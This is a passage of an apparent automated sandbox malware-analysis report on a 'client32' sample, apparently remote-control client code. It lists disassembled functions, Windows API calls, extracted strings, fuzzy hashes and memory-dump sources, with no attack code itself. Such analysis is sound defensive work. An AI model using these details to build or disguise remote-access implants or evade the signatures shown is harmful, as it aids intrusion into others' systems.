                                                        • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                        • API String ID: 3234921582-2664294811
                                                        • Opcode ID: d3963ed258874b49d6020dc6d10e6edddcef5a371903b28941bd5c66df2d9fea
                                                        • Instruction ID: 86aa9e5bcbae8f8c2bc6393a2fe4af4140ad48230e9cd7b97cb8b02b288cada0
                                                        • Opcode Fuzzy Hash: d3963ed258874b49d6020dc6d10e6edddcef5a371903b28941bd5c66df2d9fea
                                                        • Instruction Fuzzy Hash: 24F0F6BAE0012867C7109AA5AC41FDFF7AC9F82608F4000A9FE0467142EA70AB01CBE5
                                                        Function 1102FC90 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • wsprintfA.USER32 ref: 1102FD46
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wsprintf$ErrorExitLastMessageProcess
                                                        • String ID: %s%s.bin$494126$clientinv.cpp$m_pDoInv == NULL
                                                        • API String ID: 4180936305-641825243
                                                        • Opcode ID: 5c7d3b0ce6cdb17c67caba4e79f62d2df26f4e5501008924e72aac950388db45
                                                        • Instruction ID: 34a2fd1cf9ce17e411a54b0388ef97a3e351311eb6f0b41dc2420f2fea7f0bd6
                                                        • Opcode Fuzzy Hash: 5c7d3b0ce6cdb17c67caba4e79f62d2df26f4e5501008924e72aac950388db45
                                                        • Instruction Fuzzy Hash: 022190B5E00709AFD710DF25CC80BABB7E5FB44758F10852DEC5597781EA34A8008B51
                                                        Function 11133AC0 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesA.KERNEL32(11134108,00000000,?,11134108,00000000), ref: 11133ADC
                                                        • __strdup.LIBCMT ref: 11133AF7
                                                          • Part of subcall function 1107C480: _strrchr.LIBCMT ref: 1107C48E
                                                          • Part of subcall function 11133AC0: _free.LIBCMT ref: 11133B1E
                                                        • _free.LIBCMT ref: 11133B2C
                                                          • Part of subcall function 11151665: HeapFree.KERNEL32(00000000,00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115167B
                                                          • Part of subcall function 11151665: GetLastError.KERNEL32(00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115168D
                                                        • CreateDirectoryA.KERNEL32(11134108,00000000,?,?,?,11134108,00000000), ref: 11133B37
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                        • String ID:
                                                        • API String ID: 398584587-0
                                                        • Opcode ID: 003d8b81bd00a6845321ecaa249ead445a6f39f9a1119b8ade07daca962c11ae
                                                        • Instruction ID: aa2e0163475f2b812501e4eb99de98075b3d8b88882ce7cf24685a9f1b499ad4
                                                        • Opcode Fuzzy Hash: 003d8b81bd00a6845321ecaa249ead445a6f39f9a1119b8ade07daca962c11ae
                                                        • Instruction Fuzzy Hash: 8801F977B381125AF301157D6D06BBBBB898BC26BEF084131F81DC6388F656E40641AA
                                                        Function 1100ED20 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100ED52
                                                          • Part of subcall function 1114F2A4: _setlocale.LIBCMT ref: 1114F2B6
                                                        • _free.LIBCMT ref: 1100ED64
                                                          • Part of subcall function 11151665: HeapFree.KERNEL32(00000000,00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115167B
                                                          • Part of subcall function 11151665: GetLastError.KERNEL32(00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115168D
                                                        • _free.LIBCMT ref: 1100ED77
                                                        • _free.LIBCMT ref: 1100ED8A
                                                        • _free.LIBCMT ref: 1100ED9D
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                        • String ID:
                                                        • API String ID: 3515823920-0
                                                        • Opcode ID: 9bfe9a0044719da1540a6c3a3859510d02c70a70b416b29b9435fc6d5270a75b
                                                        • Instruction ID: 588ec97cc091706e3c2c0aaa6ce4e6b1d1c1f942a88aaefcf008b7de89352c8d
                                                        • Opcode Fuzzy Hash: 9bfe9a0044719da1540a6c3a3859510d02c70a70b416b29b9435fc6d5270a75b
                                                        • Instruction Fuzzy Hash: F011C4F1E00A509BDB20CF5DDC45A0BFBECEF41A58F144A2AE466D3740E771F9048A62
                                                        Function 11134C40 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11133F90: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11182A50), ref: 11133FFD
                                                          • Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110291B), ref: 1113403E
                                                          • Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113409B
                                                        • wsprintfA.USER32 ref: 11134C6E
                                                        • wsprintfA.USER32 ref: 11134C84
                                                          • Part of subcall function 11132680: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110291B,75A38400,?), ref: 11132717
                                                          • Part of subcall function 11132680: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11132737
                                                          • Part of subcall function 11132680: CloseHandle.KERNEL32(00000000), ref: 1113273F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                        • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                        • API String ID: 3779116287-2600120591
                                                        • Opcode ID: 6f9fb2a0753f6b8cd2e83ce6ab7fdde4b6155579ab5954c43e92d8c6d65f5ec9
                                                        • Instruction ID: 9c67431b43c70ff94c5574da105f7ccddca851e71d4d99b5eda6b1c9b98572d3
                                                        • Opcode Fuzzy Hash: 6f9fb2a0753f6b8cd2e83ce6ab7fdde4b6155579ab5954c43e92d8c6d65f5ec9
                                                        • Instruction Fuzzy Hash: 180124BAD0420966CB10DBA19C45FEBF7AC8F4421DF000196EC1997144ED20BA04CBD5
                                                        Function 110F6330 Relevance: 7.5, APIs: 5, Instructions: 44threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11083B60: UnhookWindowsHookEx.USER32(?), ref: 11083B83
                                                        • GetCurrentThreadId.KERNEL32 ref: 110F634B
                                                        • GetThreadDesktop.USER32(00000000), ref: 110F6352
                                                        • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 110F6362
                                                        • SetThreadDesktop.USER32(00000000), ref: 110F636F
                                                        • CloseDesktop.USER32(00000000), ref: 110F6376
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Desktop$Thread$CloseCurrentHookOpenUnhookWindows
                                                        • String ID:
                                                        • API String ID: 2408936056-0
                                                        • Opcode ID: bf5bd5ec6e24239bd4284135f98232e0e3e86c08e23b3486cbd5775944da8910
                                                        • Instruction ID: 33a7dbd132630a5f65e042d10e45e308f8ac0c24a7c2882920133d3588b1205b
                                                        • Opcode Fuzzy Hash: bf5bd5ec6e24239bd4284135f98232e0e3e86c08e23b3486cbd5775944da8910
                                                        • Instruction Fuzzy Hash: 5EF0C87BF056252FD70267B19C49B7F7A169FC5669F080024F5055B240FF14750183E6
                                                        Function 11132680 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110291B,75A38400,?), ref: 11132717
                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11132737
                                                        • CloseHandle.KERNEL32(00000000), ref: 1113273F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile$CloseHandle
                                                        • String ID: "
                                                        • API String ID: 1443461169-123907689
                                                        • Opcode ID: d102bea1e6aa5fe3566526d06b5f8e35bf021a81daf64ee8083e2d945d049b8f
                                                        • Instruction ID: 440ab7f6f978ac94d5fbb5a1369e97e0d7071da94511d4ee7fb8c05e869e7eaa
                                                        • Opcode Fuzzy Hash: d102bea1e6aa5fe3566526d06b5f8e35bf021a81daf64ee8083e2d945d049b8f
                                                        • Instruction Fuzzy Hash: B6218E31A04288AFE712DE38DD54BD5BB94AF86325F2041E4EDD5DB1C9DA709A48C750
                                                        Function 1102BA80 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,82E0FB89,771B2EE0,?,00000000,1117AD0B,000000FF,?,1102E64C,Client,UseIPC,00000001), ref: 1102BB37
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                          • Part of subcall function 11102970: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7774C3F0,?,1110371D,00000000,00000001,?,?,?,?,?,1102F49F), ref: 1110298E
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102BAFA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                        • String ID: Client$DisableGeolocation
                                                        • API String ID: 3315423714-4166767992
                                                        • Opcode ID: 082469f737cabc087ebed4c4132e4a8d6814facffb7a87528326485359a24fac
                                                        • Instruction ID: 909c90258048426ad92c62856d2e7a2749a5947dbc84b876734554e22f69ddca
                                                        • Opcode Fuzzy Hash: 082469f737cabc087ebed4c4132e4a8d6814facffb7a87528326485359a24fac
                                                        • Instruction Fuzzy Hash: 3E21DF34A41760BBEB21DB24CC45F9AF7E4A708B18F10426AFD255B3C4EBF4A4008B84
                                                        Function 11025F10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025F3A
                                                          • Part of subcall function 110C3120: EnterCriticalSection.KERNEL32(00000000,00000000,75A33760,00000000,75A4A1D0,1105952B,?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C313B
                                                          • Part of subcall function 110C3120: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110C3168
                                                          • Part of subcall function 110C3120: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110C317A
                                                          • Part of subcall function 110C3120: LeaveCriticalSection.KERNEL32(?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C3184
                                                        • TranslateMessage.USER32(?), ref: 11025F50
                                                        • DispatchMessageA.USER32(?), ref: 11025F56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                        • String ID: Exit Msgloop, quit=%d
                                                        • API String ID: 3212272093-2210386016
                                                        • Opcode ID: 93184a9a7f577379092be9016fa146486f24bb93b5182c7edd668e587e3e6a0f
                                                        • Instruction ID: 458663acd1e32bc52ab21155f198d3aa4dad7224c1f0df94b4fde6d061364d2b
                                                        • Opcode Fuzzy Hash: 93184a9a7f577379092be9016fa146486f24bb93b5182c7edd668e587e3e6a0f
                                                        • Instruction Fuzzy Hash: D0F0FC77E111156FDA00DAD59CC1FEFF37CAB84615FC08165EE1593148F631B40587A1
                                                        Function 6C803AB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C803AC4
                                                        • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C80774D,00000000,?,6C80774D,00000000,?,00000FA0,?), ref: 6C803AE4
                                                        • SetLastError.KERNEL32(00000078,00000000,?,6C80774D,00000000,?,00000FA0,?), ref: 6C803AED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: AddressEnumErrorLastModulesProcProcess
                                                        • String ID: EnumProcessModules
                                                        • API String ID: 3858832252-3735562946
                                                        • Opcode ID: 95d265c68ec06678dd6ddba2120f17d6d4eb501bf0d033449ae239990ae5a7a0
                                                        • Instruction ID: 33c51e2b2cffd115324e6d46f31cebea819db7898a5ad9ab85c7682ae2b5819c
                                                        • Opcode Fuzzy Hash: 95d265c68ec06678dd6ddba2120f17d6d4eb501bf0d033449ae239990ae5a7a0
                                                        • Instruction Fuzzy Hash: 54F05872610628AFC720DFA4D844E9B73E8EB48720F00CD2AF95A97640C674EC10CBE0
                                                        Function 6C803B00 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C803B14
                                                        • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C807790,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C803B34
                                                        • SetLastError.KERNEL32(00000078,00000000,?,6C807790,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C803B3D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: AddressErrorFileLastModuleNameProc
                                                        • String ID: GetModuleFileNameExA
                                                        • API String ID: 4084229558-758377266
                                                        • Opcode ID: b06eb2de9347af3d6cc6390ca9aa3c150367fdad0b6223dbde30791de9b933f6
                                                        • Instruction ID: 19854a4eca82f621a24e2b0fc39098ed98860ecc84f8e19ba023106c38c3f173
                                                        • Opcode Fuzzy Hash: b06eb2de9347af3d6cc6390ca9aa3c150367fdad0b6223dbde30791de9b933f6
                                                        • Instruction Fuzzy Hash: 09F03A72600228ABD730DEA4E944E9773A8AB48715F004A2AF94997640C670EC14CBE1
                                                        Function 1106B810 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32(000000FA), ref: 1106B867
                                                        • EnterCriticalSection.KERNEL32(?), ref: 1106B874
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 1106B946
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
